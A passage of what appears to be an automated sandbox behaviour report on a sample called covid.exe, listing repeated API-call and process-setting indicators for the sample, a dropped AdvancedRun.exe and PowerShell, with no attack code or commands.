Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 5_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,5_2_00401306
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 5_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_00408E31
Source: C:\Users\user\Desktop\covid.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: